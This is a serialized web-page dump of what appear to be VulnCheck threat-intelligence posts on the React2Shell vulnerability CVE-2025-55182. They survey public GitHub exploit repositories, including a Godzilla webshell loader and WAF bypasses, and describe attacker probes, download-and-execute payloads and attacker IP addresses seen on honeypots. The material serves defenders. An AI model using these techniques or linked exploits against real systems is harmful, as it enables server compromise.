It now includes a solid writeup and a Python-based implementation.",[25,22128,22129,22133],{},[47,22130,22131],{"href":22131,"rel":22132},"https:\u002F\u002Fgithub.com\u002Flachlan2k\u002FReact2Shell-CVE-2025-55182-original-poc",[51],": Exploits developed by the original bug finder, with three JavaScript variants.",[25,22135,22136,22140],{},[47,22137,22138],{"href":22138,"rel":22139},"https:\u002F\u002Fgithub.com\u002Fzack0x01\u002FCVE-2025-55182-advanced-scanner-",[51],": A straightforward bash-based scanner.",[18,22142,22143],{},"Interestingly, the three most popular repositories are each written in different languages: Python, JavaScript, and bash. That mix reflects not only the range of developers experimenting with React2Shell, but also the simplicity of the underlying exploit, which makes it easy to reimplement in whatever language someone prefers. This pattern shows up clearly in the overall language distribution.",[14603,22145,22147],{"id":22146},"repository-count-vs-language","Repository Count vs. Language",[11128,22149],{":labels":22150,":values":22151},"[\"Python\",\"JavaScript\",\"Shell\",\"Go\",\"TypeScript\",\"Lua\",\"Rust\",\"Perl\",\"Dockerfile\"]","[68,16,13,7,6,4,3,1,1]",[18,22153,22154],{},"Python dominating the scene is unsurprising. Most public “exploit development” is done by security “researchers” who can barely cobble together a Python script and want nothing to do with C, C++, or nontrivial JavaScript.",[18,22156,22157,22158,22162,22163,22167],{},"The language distribution still has a few interesting quirks. The repositories marked “Lua,” for example, are all Nmap NSE scripts, such as this one: ",[47,22159,22160],{"href":22160,"rel":22161},"https:\u002F\u002Fgithub.com\u002Fyunaranyancat\u002FCVE-2025-55182-NSE\u002Fblob\u002Fmain\u002FCVE-2025-55182.nse",[51],". Because Nmap already provides mass scanning and reporting capabilities, these scripts can be more practical in real-world operations than generic Python PoCs. 
This particular NSE script also mirrors behaviors ",[47,22164,22166],{"href":21690,"rel":22165},[51],"we have seen"," in our Canary Intelligence data, including the hardcoded multipart boundary `----WebKitFormBoundaryx8jO2oVc6SWP3Sad`, PowerShell and echo-based math checks, and the Assetnote User-Agent. Seeing public PoCs align so closely with attacker behavior is unusual and noteworthy.",[18,22169,22170,22171,22176],{},"Another oddity is a repository marked as “Dockerfile.” It contains a Dockerfile that builds a vulnerable environment and a docker-compose file for running it, which normally wouldn’t qualify it as an exploit. However, the repository also includes a ",[47,22172,22175],{"href":22173,"rel":22174},"https:\u002F\u002Fgithub.com\u002FCharlesTheGreat77\u002FCVE-2025-55182-Test-Server\u002Fblob\u002Fmain\u002Freact-rsc-rce.yaml",[51],"Nuclei"," template that actively exercises the vulnerable behavior to determine whether the issue is present. Tools like this sit in an odd space: they are not “exploits” in the traditional sense because they do not achieve code execution, but they go beyond simple version checks. We categorize this kind of entry as an “infoleak,” a very small slice of the vulnerabilities we track.",[61,22178,22180],{"id":22179},"noteworthy-exploits-and-why-they-matter","Noteworthy Exploits (and Why They Matter)",[18,22182,22183,22184,22189,22190,22195,22196,22201],{},"Some of the most interesting repositories don’t stand out in any graph but are absolutely worth calling out. One example is a ",[47,22185,22188],{"href":22186,"rel":22187},"https:\u002F\u002Fgithub.com\u002FBeichenDream\u002FCVE-2025-55182-GodzillaMemoryShell\u002F",[51],"repository"," published on December 10 that includes logic for loading the ",[47,22191,22194],{"href":22192,"rel":22193},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fjsp.godzilla_webshell",[51],"Godzilla"," webshell onto affected systems. 
Godzilla is a weaponized in-memory webshell widely used by real ",[47,22197,22200],{"href":22198,"rel":22199},"https:\u002F\u002Fwww.hhs.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fnovember-2024%E2%80%93godzilla-webshell-analyst-note.pdf",[51],"attackers",", and in-memory shells are especially dangerous because they never touch disk, which lets them evade file-based detection techniques such as antivirus scanning and webshell file monitoring.",[18,22203,22204,22205,22212,22213,22218],{},"A public proof of concept that deploys Godzilla all but guarantees we will see this technique used in the wild. We have seen this pattern before. In our ",[47,22206,22209],{"href":22207,"rel":22208},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fconfluence-dreams-of-shells",[51],[1131,22210,22211],{},"Does Confluence Dream of Shells?"," research, we documented how ",[47,22214,22217],{"href":22215,"rel":22216},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-22527",[51],"CVE-2023-22527"," proofs of concept loaded Godzilla-style in-memory shells and influenced real exploit behavior, and the same dynamics are at play here.",[18,22220,22221,22222,22227,22228,22233],{},"The Godzilla loader was not the only interesting in-memory work to appear. In fact, the first in-memory webshell implementation we saw was in the ",[47,22223,22226],{"href":22224,"rel":22225},"https:\u002F\u002Fgithub.com\u002FMalayke\u002FNext.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#-runtime-memory-shell-",[51],"Malayke"," repository, which documented several Next.js exploit variants and included its own in-memory shell. 
We ",[47,22229,22232],{"href":22230,"rel":22231},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2025-55182",[51],"published"," a Go-based variant during our analysis so we could better understand how defenders might attempt to detect the attack.",[18,22235,22236,22237,22241,22242,22247],{},"Another ",[47,22238,22188],{"href":22239,"rel":22240},"https:\u002F\u002Fgithub.com\u002Faiexz\u002FCVE-2025-66478-kinda-waf\u002F",[51],", by ",[47,22243,22246],{"href":22244,"rel":22245},"https:\u002F\u002Fgithub.com\u002Faiexz",[51],"aiexz",", went in a very different direction. Instead of installing a webshell, it deployed a lightweight WAF to block React2Shell payloads entirely. It is an unexpected but clever twist: using the vulnerability to defend against the vulnerability.",[18,22249,22250],{},"There are other interesting repositories that deserve callouts:",[1789,22252,22253,22260,22272],{},[25,22254,22255,22259],{},[47,22256,22257],{"href":22257,"rel":22258},"https:\u002F\u002Fgithub.com\u002FLegus-Yeung\u002FCVE-2025-55182-exploit\u002F",[51],": This one does not attempt RCE at all. Instead, it leaks environment variables, which is a valuable primitive in many real-world attacks.",[25,22261,22262,22266,22267,59],{},[47,22263,22264],{"href":22264,"rel":22265},"https:\u002F\u002Fgithub.com\u002Fhackersatyamrastogi\u002Freact2shell-ultimate\u002F",[51],": The “ultimate” scanner. 
It packs an impressive number of features into 1700 lines of Python, including the “large blob of data” WAF bypass, and even has its own ",[47,22268,22271],{"href":22269,"rel":22270},"https:\u002F\u002Fwww.react2shellscanner.com\u002F",[51],"website",[25,22273,22274,22278],{},[47,22275,22276],{"href":22276,"rel":22277},"https:\u002F\u002Fgithub.com\u002Fpyroxenites\u002FNextjs_RCE_Exploit_Tool\u002F",[51],": A GUI-based tool by a Chinese-language developer, complete with a built-in Unicode-based WAF bypass.",[61,22280,22282],{"id":22281},"accessing-the-data-yourself","Accessing the Data Yourself",[18,22284,22285,22286,22290],{},"If you want to see the data behind all of this, you can. VulnCheck’s ",[47,22287,22289],{"href":11516,"rel":22288},[51],"XDB","  is public and free, and it contains every React2Shell exploit that survived moderation. If you would like to browse the curated set, you can search for CVE-2025-55182:",[18,22292,22293],{},[68,22294],{"alt":22295,"src":22296,"style":22297},"XDB Example","\u002Fblog\u002Freact2shell-github\u002Fxdb-results.png","width: 100%; height: auto; margin-left: auto; margin-right: auto;",[18,22299,22300,22301,4606],{},"If you create a free account, our VulnCheck KEV will also show you the associated XDB entries for each CVE. This makes it easy to move from vulnerability information to the curated exploit set. 
Here is a small snippet from the KEV API for ",[47,22302,10533],{"href":22303,"rel":22304},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2025-55182",[51],[1354,22306,22310],{"className":22307,"code":22308,"language":22309,"meta":219,"style":219},"language-json shiki shiki-themes material-theme-lighter github-light github-dark monokai","\"vulncheck_xdb\": [\n{\n    \"xdb_id\": \"b5a20e095cc3\",\n    \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb5a20e095cc3\",\n    \"date_added\": \"2025-12-04T11:49:55Z\",\n    \"exploit_type\": \"initial-access\",\n    \"clone_ssh_url\": \"git@github.com:msanft\u002FCVE-2025-55182.git\"\n},\n{\n    \"xdb_id\": \"2caf5e7a5d9b\",\n    \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2caf5e7a5d9b\",\n    \"date_added\": \"2025-12-04T14:49:43Z\",\n    \"exploit_type\": \"initial-access\",\n    \"clone_ssh_url\": \"git@github.com:acheong08\u002FCVE-2025-55182-poc.git\"\n},\n{\n    \"xdb_id\": \"b3583e9145ea\",\n    \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb3583e9145ea\",\n    \"date_added\": \"2025-12-04T17:18:42Z\",\n    \"exploit_type\": \"infoleak\",\n    \"clone_ssh_url\": 
\"git@github.com:klassiker\u002FCVE-2025-55182.git\"\n},\n","json",[886,22311,22312,22325,22329,22349,22369,22388,22407,22425,22430,22434,22453,22472,22491,22509,22526,22530,22534,22553,22572,22591,22610,22627],{"__ignoreMap":219},[1373,22313,22314,22316,22319,22321,22323],{"class":1375,"line":1376},[1373,22315,183],{"class":1387},[1373,22317,22318],{"class":1391},"vulncheck_xdb",[1373,22320,183],{"class":1387},[1373,22322,20051],{"class":4640},[1373,22324,9050],{"class":1383},[1373,22326,22327],{"class":1375,"line":220},[1373,22328,8904],{"class":1383},[1373,22330,22331,22333,22336,22338,22340,22342,22345,22347],{"class":1375,"line":1266},[1373,22332,19050],{"class":9152},[1373,22334,22335],{"class":9155},"xdb_id",[1373,22337,183],{"class":9152},[1373,22339,4606],{"class":1383},[1373,22341,4883],{"class":9173},[1373,22343,22344],{"class":9176},"b5a20e095cc3",[1373,22346,183],{"class":9173},[1373,22348,9062],{"class":1383},[1373,22350,22351,22353,22356,22358,22360,22362,22365,22367],{"class":1375,"line":1852},[1373,22352,19050],{"class":9152},[1373,22354,22355],{"class":9155},"xdb_url",[1373,22357,183],{"class":9152},[1373,22359,4606],{"class":1383},[1373,22361,4883],{"class":9173},[1373,22363,22364],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb5a20e095cc3",[1373,22366,183],{"class":9173},[1373,22368,9062],{"class":1383},[1373,22370,22371,22373,22375,22377,22379,22381,22384,22386],{"class":1375,"line":4692},[1373,22372,19050],{"class":9152},[1373,22374,12998],{"class":9155},[1373,22376,183],{"class":9152},[1373,22378,4606],{"class":1383},[1373,22380,4883],{"class":9173},[1373,22382,22383],{"class":9176},"2025-12-04T11:49:55Z",[1373,22385,183],{"class":9173},[1373,22387,9062],{"class":1383},[1373,22389,22390,22392,22395,22397,22399,22401,22403,22405],{"class":1375,"line":4724},[1373,22391,19050],{"class":9152},[1373,22393,22394],{"class":9155},"exploit_type",[1373,22396,183],{"class":9152},[1373,22398,4606],{"class":1383},[1373,22400,4883],{"class":
9173},[1373,22402,1281],{"class":9176},[1373,22404,183],{"class":9173},[1373,22406,9062],{"class":1383},[1373,22408,22409,22411,22414,22416,22418,22420,22423],{"class":1375,"line":4756},[1373,22410,19050],{"class":9152},[1373,22412,22413],{"class":9155},"clone_ssh_url",[1373,22415,183],{"class":9152},[1373,22417,4606],{"class":1383},[1373,22419,4883],{"class":9173},[1373,22421,22422],{"class":9176},"git@github.com:msanft\u002FCVE-2025-55182.git",[1373,22424,19057],{"class":9173},[1373,22426,22427],{"class":1375,"line":4768},[1373,22428,22429],{"class":1383},"},\n",[1373,22431,22432],{"class":1375,"line":4792},[1373,22433,8904],{"class":1383},[1373,22435,22436,22438,22440,22442,22444,22446,22449,22451],{"class":1375,"line":4798},[1373,22437,19050],{"class":9152},[1373,22439,22335],{"class":9155},[1373,22441,183],{"class":9152},[1373,22443,4606],{"class":1383},[1373,22445,4883],{"class":9173},[1373,22447,22448],{"class":9176},"2caf5e7a5d9b",[1373,22450,183],{"class":9173},[1373,22452,9062],{"class":1383},[1373,22454,22455,22457,22459,22461,22463,22465,22468,22470],{"class":1375,"line":4806},[1373,22456,19050],{"class":9152},[1373,22458,22355],{"class":9155},[1373,22460,183],{"class":9152},[1373,22462,4606],{"class":1383},[1373,22464,4883],{"class":9173},[1373,22466,22467],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2caf5e7a5d9b",[1373,22469,183],{"class":9173},[1373,22471,9062],{"class":1383},[1373,22473,22474,22476,22478,22480,22482,22484,22487,22489],{"class":1375,"line":4817},[1373,22475,19050],{"class":9152},[1373,22477,12998],{"class":9155},[1373,22479,183],{"class":9152},[1373,22481,4606],{"class":1383},[1373,22483,4883],{"class":9173},[1373,22485,22486],{"class":9176},"2025-12-04T14:49:43Z",[1373,22488,183],{"class":9173},[1373,22490,9062],{"class":1383},[1373,22492,22493,22495,22497,22499,22501,22503,22505,22507],{"class":1375,"line":4825},[1373,22494,19050],{"class":9152},[1373,22496,22394],{"class":9155},[1373,22498,183],{"class":9152},[137
3,22500,4606],{"class":1383},[1373,22502,4883],{"class":9173},[1373,22504,1281],{"class":9176},[1373,22506,183],{"class":9173},[1373,22508,9062],{"class":1383},[1373,22510,22511,22513,22515,22517,22519,22521,22524],{"class":1375,"line":4835},[1373,22512,19050],{"class":9152},[1373,22514,22413],{"class":9155},[1373,22516,183],{"class":9152},[1373,22518,4606],{"class":1383},[1373,22520,4883],{"class":9173},[1373,22522,22523],{"class":9176},"git@github.com:acheong08\u002FCVE-2025-55182-poc.git",[1373,22525,19057],{"class":9173},[1373,22527,22528],{"class":1375,"line":4843},[1373,22529,22429],{"class":1383},[1373,22531,22532],{"class":1375,"line":4849},[1373,22533,8904],{"class":1383},[1373,22535,22536,22538,22540,22542,22544,22546,22549,22551],{"class":1375,"line":4877},[1373,22537,19050],{"class":9152},[1373,22539,22335],{"class":9155},[1373,22541,183],{"class":9152},[1373,22543,4606],{"class":1383},[1373,22545,4883],{"class":9173},[1373,22547,22548],{"class":9176},"b3583e9145ea",[1373,22550,183],{"class":9173},[1373,22552,9062],{"class":1383},[1373,22554,22555,22557,22559,22561,22563,22565,22568,22570],{"class":1375,"line":4915},[1373,22556,19050],{"class":9152},[1373,22558,22355],{"class":9155},[1373,22560,183],{"class":9152},[1373,22562,4606],{"class":1383},[1373,22564,4883],{"class":9173},[1373,22566,22567],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb3583e9145ea",[1373,22569,183],{"class":9173},[1373,22571,9062],{"class":1383},[1373,22573,22574,22576,22578,22580,22582,22584,22587,22589],{"class":1375,"line":4931},[1373,22575,19050],{"class":9152},[1373,22577,12998],{"class":9155},[1373,22579,183],{"class":9152},[1373,22581,4606],{"class":1383},[1373,22583,4883],{"class":9173},[1373,22585,22586],{"class":9176},"2025-12-04T17:18:42Z",[1373,22588,183],{"class":9173},[1373,22590,9062],{"class":1383},[1373,22592,22593,22595,22597,22599,22601,22603,22606,22608],{"class":1375,"line":4947},[1373,22594,19050],{"class":9152},[1373,22596,22394],{"class":91
55},[1373,22598,183],{"class":9152},[1373,22600,4606],{"class":1383},[1373,22602,4883],{"class":9173},[1373,22604,22605],{"class":9176},"infoleak",[1373,22607,183],{"class":9173},[1373,22609,9062],{"class":1383},[1373,22611,22612,22614,22616,22618,22620,22622,22625],{"class":1375,"line":4952},[1373,22613,19050],{"class":9152},[1373,22615,22413],{"class":9155},[1373,22617,183],{"class":9152},[1373,22619,4606],{"class":1383},[1373,22621,4883],{"class":9173},[1373,22623,22624],{"class":9176},"git@github.com:klassiker\u002FCVE-2025-55182.git",[1373,22626,19057],{"class":9173},[1373,22628,22629],{"class":1375,"line":6776},[1373,22630,22429],{"class":1383},[18,22632,22633],{},"This brings us to the bigger picture. React2Shell is not just a high-volume CVE, but a reflection of several trends we have been seeing in the public exploit ecosystem.",[61,22635,22637],{"id":22636},"what-react2shell-teaches-us","What React2Shell Teaches Us",[18,22639,22640],{},"React2Shell produced an enormous volume of public exploit repositories. About half of what we reviewed was broken, misleading, or otherwise unusable. Without curation, the meaningful material quickly gets buried by the noise.",[18,22642,22643],{},"Even so, there were genuinely interesting ideas in the mix: in-memory shells, creative payload variations, scanners with real capability, and even defensive uses of the vulnerability. The challenge is simply finding them. That is why we invest so much effort into reviewing public exploits and publishing the approved set. 
The curated React2Shell dataset is available in XDB for free, if you want to explore it yourself.",[61,22645,202],{"id":201},[18,22647,10768,22648,1246,22651,10775,22654,10779,22657,1246,22662,982,22667,59],{},[47,22649,283],{"href":281,"rel":22650},[51],[47,22652,216],{"href":1258,"rel":22653},[51],[47,22655,1251],{"href":1249,"rel":22656},[51],[47,22658,22660],{"href":10789,"rel":22659},[51],[1131,22661,10793],{},[47,22663,22665],{"href":10796,"rel":22664},[51],[1131,22666,10801],{},[47,22668,22670],{"href":19435,"rel":22669},[51],[1131,22671,19437],{},[18,22673,1228,22674,1234,22677,1240,22680,1246,22683,1246,22686,1255,22689,1260],{},[47,22675,1233],{"href":10806,"rel":22676},[51],[47,22678,1239],{"href":1237,"rel":22679},[51],[47,22681,1245],{"href":1243,"rel":22682},[51],[47,22684,1251],{"href":1249,"rel":22685},[51],[47,22687,283],{"href":281,"rel":22688},[51],[47,22690,216],{"href":1258,"rel":22691},[51],[2901,22693,22694],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki 
.sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: 
var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":22696},[22697,22698,22699,22700,22701,22702],{"id":22053,"depth":220,"text":22054},{"id":22102,"depth":220,"text":22103},{"id":22179,"depth":220,"text":22180},{"id":22281,"depth":220,"text":22282},{"id":22636,"depth":220,"text":22637},{"id":201,"depth":220,"text":202},"VulnCheck reviewed the full wave of React2Shell exploits published on GitHub, discarding about half as broken or misleading and surfacing several genuinely interesting techniques from the rest. We curated the usable set, highlighted the notable variants, and made the entire approved dataset freely available in VulnCheck's Exploit Database (XDB).",{"slug":22705},"react2shell-github","\u002Fblog\u002Freact2shell-github",{"title":21701,"description":22703},"blog\u002Freact2shell-github",[242,1279,22710],"xdb","UcOC6XrXnZufiTzJHqOOV6vDRYPhxT4v6zzkKkZ5S98",{"id":22713,"title":21694,"articles":22714,"authors":22719,"body":22721,"date":22718,"description":23268,"extension":234,"image":7,"link":7,"meta":23269,"navigation":237,"path":23271,"seo":23272,"series":7,"stem":23273,"subtype":7,"tags":23274,"__hash__":23276},"blog\u002Fblog\u002Freact2shell-canaries.md",[22715],{"title":22716,"source":12191,"link":22717,"date":22718},"Broad Exploit Activity Targets React2Shell 
Flaw","https:\u002F\u002Fdecipher.sc\u002F2025\u002F12\u002F08\u002Fbroad-exploit-activity-targets-react2shell-flaw\u002F","2025-12-09",[22720],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":22722,"toc":23262},[22723,22726,22731,22757,22761,22776,22780,22784,22794,22798,22802,22805,22809,22819,22823,22827,22833,22837,22841,22854,22863,22867,22871,22883,22887,22891,22903,22907,22911,22914,22918,22921,22934,22938,22942,22952,22957,22961,22972,22977,22981,22988,22993,22997,23006,23009,23014,23018,23021,23023,23026,23030,23214,23216,23242],[263,22724],{":list":22725,"ico":266,"title":20},"[\"Attackers are rapidly adopting React2Shell, but their exploitation techniques remain simple and easily detectable.\",\"Probing techniques show far more variation than the payloads, which are almost entirely download-and-execute across the IPs hitting our canaries.\",\"VulnCheck Canary Intelligence shows how attackers are operationalizing React2Shell, and the IPs we’ve collected are listed below for defenders to use.\"]",[18,22727,22728],{},[1131,22729,22730],{},"The data used in this blog was collected at 5pm EST on December 8, 2025.",[18,22732,22733,1246,22736,22740,22741,22744,22745,22749,22750,22753,22754,59],{},[47,22734,10533],{"href":10531,"rel":22735},[51],[47,22737,22739],{"href":21675,"rel":22738},[51],"React2Shell",", is an appealing bug for attackers because it offers multiple paths to exploitation. Inside VulnCheck, the ",[47,22742,1245],{"href":1243,"rel":22743},[51]," team spends time on the nuances, such as how the in-memory ",[47,22746,22748],{"href":22230,"rel":22747},[51],"webshell"," works and how bypasses develop. Real-world attackers often take a different approach, folding the bug into the tooling and workflows they already rely on. To understand how React2Shell is appearing in real attacks, we looked at the probes and payloads hitting our ",[47,22751,283],{"href":281,"rel":22752},[51],". 
Our research team also has exploit, PoC, and variant analysis ",[47,22755,305],{"href":20134,"rel":22756},[51],[61,22758,22760],{"id":22759},"early-probes-and-first-payloads","Early Probes and First Payloads",[18,22762,22763,22764,22767,22768,22771,22772,22775],{},"The first React2Shell payload that hit our canary network, on December 5 around 5 am EST, looked relatively benign. It was a straightforward vulnerability check from ",[886,22765,22766],{},"95.214.52.170"," that issued a ",[886,22769,22770],{},"ping"," to ",[886,22773,22774],{},"45.157.233.80"," to confirm successful exploitation.",[68,22777],{"src":22778,"alt":21258,"className":22779},"\u002Fblog\u002Freact2shell-canaries\u002F1-light.png",[10876,21260],[68,22781],{"src":22782,"alt":21258,"className":22783},"\u002Fblog\u002Freact2shell-canaries\u002F1.png",[21265,21266],[18,22785,22786,22787,1554,22790,22793],{},"But upon success, this attacker returned, fetching binaries from ",[886,22788,22789],{},"31.56.27.76",[886,22791,22792],{},"193.34.213.150",". Their follow-up activity consisted of downloading and executing a binary hosted elsewhere.",[68,22795],{"src":22796,"alt":21292,"className":22797},"\u002Fblog\u002Freact2shell-canaries\u002F2-light.png",[10876,21260],[68,22799],{"src":22800,"alt":21292,"className":22801},"\u002Fblog\u002Freact2shell-canaries\u002F2.png",[21265,21266],[18,22803,22804],{},"This pattern has been consistent over the last few days: a variety of vulnerability probes followed by the download and execution of weaponized payloads. The probes are worth examining in more detail.",[61,22806,22808],{"id":22807},"vulnerability-probing","Vulnerability Probing",[18,22810,22811,22812,22815,22816,4606],{},"The vulnerability checks we’ve observed fall into five main flavors. The first is ",[886,22813,22814],{},"uname","-based. A successful check gives the attacker immediate system details on Linux hosts, such as the distribution and architecture. 
Below is an example probe from ",[886,22817,22818],{},"74.201.72.250",[68,22820],{"src":22821,"alt":21314,"className":22822},"\u002Fblog\u002Freact2shell-canaries\u002F3-light.png",[10876,21260],[68,22824],{"src":22825,"alt":21314,"className":22826},"\u002Fblog\u002Freact2shell-canaries\u002F3.png",[21265,21266],[18,22828,22829,22830,59],{},"The second most common probe is math-based. Honeypots rarely return the correct output, which makes this type of check appealing to attackers. It comes in two forms: a Linux variant and a PowerShell variant, often sent together by the same actor. The following example came over a single TCP connection from ",[886,22831,22832],{},"143.110.184.254",[68,22834],{"src":22835,"alt":21330,"className":22836},"\u002Fblog\u002Freact2shell-canaries\u002F4-light.png",[10876,21260],[68,22838],{"src":22839,"alt":21330,"className":22840},"\u002Fblog\u002Freact2shell-canaries\u002F4.png",[21265,21266],[18,22842,22843,22844,22847,22848,22853],{},"It’s also worth noting the hard-coded multipart boundary. ",[886,22845,22846],{},"------WebKitFormBoundaryx8jO2oVc6SWP3Sad"," matches the one used in vulhub’s ",[47,22849,22852],{"href":22850,"rel":22851},"https:\u002F\u002Fraw.githubusercontent.com\u002Fvulhub\u002Fvulhub\u002Fmaster\u002Freact\u002FCVE-2025-55182\u002FREADME.md",[51],"exploit",", which only runs id. It’s another reminder that attackers frequently reuse public proof-of-concept code with minimal changes.",[18,22855,22856,22857,22859,22860,59],{},"The third flavor is similar to the previous approach. Forcing the target to perform a calculation helps distinguish a real system from a honeypot, so some attackers use an ",[886,22858,2390],{}," echo as their probe. 
Here is an example from ",[886,22861,22862],{},"79.124.40.174",[68,22864],{"src":22865,"alt":21345,"className":22866},"\u002Fblog\u002Freact2shell-canaries\u002F5-light.png",[10876,21260],[68,22868],{"src":22869,"alt":21345,"className":22870},"\u002Fblog\u002Freact2shell-canaries\u002F5.png",[21265,21266],[18,22872,22873,22874,22877,22878,22880,22881,4606],{},"I personally think the math-based approaches are the strongest, but another useful variant just executes ",[886,22875,22876],{},"whoami",". It may look less capable, but because ",[886,22879,22876],{}," runs on both Linux and Windows, it can still give attackers a quick sense of the environment. Here is an example from ",[886,22882,22766],{},[68,22884],{"src":22885,"alt":21422,"className":22886},"\u002Fblog\u002Freact2shell-canaries\u002F6-light.png",[10876,21260],[68,22888],{"src":22889,"alt":21422,"className":22890},"\u002Fblog\u002Freact2shell-canaries\u002F6.png",[21265,21266],[18,22892,22893,22894,22899,22900,4606],{},"The last flavor is much less common. Following the approach used in ",[47,22895,22898],{"href":22896,"rel":22897},"https:\u002F\u002Fslcyber.io\u002Fresearch-center\u002Fhigh-fidelity-detection-mechanism-for-rsc-next-js-rce-CVE-2025-55182-CVE-2025-66478\u002F",[51],"AssetNote’s"," scanner, some attackers simply trigger the vulnerable codepath to identify a system. Here is an example from ",[886,22901,22902],{},"167.86.107.35",[68,22904],{"src":22905,"alt":21507,"className":22906},"\u002Fblog\u002Freact2shell-canaries\u002F7-light.png",[10876,21260],[68,22908],{"src":22909,"alt":21507,"className":22910},"\u002Fblog\u002Freact2shell-canaries\u002F7.png",[21265,21266],[18,22912,22913],{},"These probes make up the bulk of the reconnaissance we’ve observed. From there, attackers move on to weaponized payloads.",[61,22915,22917],{"id":22916},"the-payloads","The Payloads",[18,22919,22920],{},"Probing tells us who’s looking. 
The payloads tell us what they want, which is exactly what Canary Intelligence is built to observe. So far, most of the payload activity has been simple “download and execute” behavior, with only a handful of interesting variations.",[18,22922,22923,22924,22927,22928,22933],{},"While most payloads follow the same simple pattern, a few attempts are more notable. For example, ",[886,22925,22926],{},"85.11.167.3"," appears to be using a WAF bypass documented by ",[47,22929,22932],{"href":22930,"rel":22931},"https:\u002F\u002Fx.com\u002Fpyn3rd\u002Fstatus\u002F1997365282344677807",[51],"@pyn3rd"," on X. The large chunk of random data is intended to evade size restrictions applied by some WAFs.",[68,22935],{"src":22936,"alt":21661,"className":22937},"\u002Fblog\u002Freact2shell-canaries\u002F8-light.png",[10876,21260],[68,22939],{"src":22940,"alt":21661,"className":22941},"\u002Fblog\u002Freact2shell-canaries\u002F8.png",[21265,21266],[18,22943,22944,22945,22947,22948,22951],{},"It’s also worth noting that ",[886,22946,22926],{}," used other, now-defunct methods as part of this activity. Their hosting at ",[886,22949,22950],{},"gfxnick.emerald.usbx.me"," is no longer accessible, suggesting that a portion of the campaign has been abandoned.",[68,22953],{"src":22954,"alt":22955,"className":22956},"\u002Fblog\u002Freact2shell-canaries\u002F9-light.png","Image 9",[10876,21260],[68,22958],{"src":22959,"alt":22955,"className":22960},"\u002Fblog\u002Freact2shell-canaries\u002F9.png",[21265,21266],[18,22962,22963,22964,22967,22968,22971],{},"Several campaigns we captured have already gone quiet, but one that remains active is worth highlighting. 
